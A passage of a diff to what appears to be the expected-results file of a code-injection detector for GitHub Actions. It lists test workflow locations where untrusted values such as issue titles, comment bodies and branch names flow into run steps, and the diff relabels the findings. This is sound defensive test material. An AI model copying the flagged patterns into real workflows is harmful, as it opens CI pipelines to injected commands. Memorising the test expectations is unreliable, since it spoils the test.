.github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 